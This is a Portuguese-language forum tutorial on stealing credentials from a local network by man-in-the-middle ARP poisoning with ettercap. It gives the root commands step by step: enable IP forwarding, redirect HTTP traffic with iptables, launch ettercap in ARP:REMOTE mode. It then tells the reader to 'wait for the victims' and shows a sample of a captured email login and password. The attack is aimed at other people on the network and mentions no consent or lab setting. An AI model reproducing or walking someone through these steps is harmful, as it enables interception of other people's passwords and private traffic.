SNIFFING COM SIMPLES ETTERCAP [PEGANDO SENHAS] (MITM)

Bom. Para iniciar meu primeiro ensinamento gostaria de compartilhar o ettercap, ferramenta antiga, porem muito funcional ainda!

Função: Capturar post datas e outras informações de sua rede local.
Tipos de informações> Emails, senhas, usuários, ip dos hosts.. ETC!

Categorias: , , ,

Descrição

Bom. Para iniciar meu primeiro ensinamento gostaria de compartilhar o ettercap, ferramenta antiga, porem muito funcional ainda!

Função: Capturar post datas e outras informações de sua rede local.
Tipos de informações> Emails, senhas, usuários, ip dos hosts.. ETC!

Vamos usar o metodo ARP poisoning (Aonde que todo o tráfego será apontado para você capturando todos dados!)
No caso, eu uso ParrotSec (Linux Debian – Distro Pentesnting) Página do sistema: https://www.parrotsec.org/
Esse metodo pode se aplicar em redes ETH0 e WLAN0 (Cabo ou Wireless)
No caso, esse metodo que vou ensinar está sem o sslstrip, que burla o https, no caso só irá funcionar com http!

(METODO POR TERMINAL)

Comandos:

Code: Select all

$ su

(Ativar o modo root)

Code: Select all

$ sysctl -w net.ipv4.ip_forward=1

(Ira liberar o repasse de pacotes na máquina para você)

Code: Select all

$ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 4003
-t : Tabela do Firewall;
-p : Protocolo;
–dport : Porta de destino;
-j : (jump) ou simplesmente alvo;
–to-port : Redirecionar para uma porta especifica.

(Este comando, ira mudar a porta do tráfego para 4003 (ou outra que você quiser))

Code: Select all

$ ettercarp -TqM ARP:REMOTE

(Iniciará o sniffing em metodo ARP)
PRONTO! SÓ AGUARDAR AS VÍTIMAS!

FORMA DE RESULTADO:
2017-10-15 192.168.0.1:8080 USER>romanosecurity@teste.com PASS> Teste123 Data (teste.com):
login=romanosecurity%40teste.com&passwd=Teste123

IRÁ APARECER ALGO PARECIDO!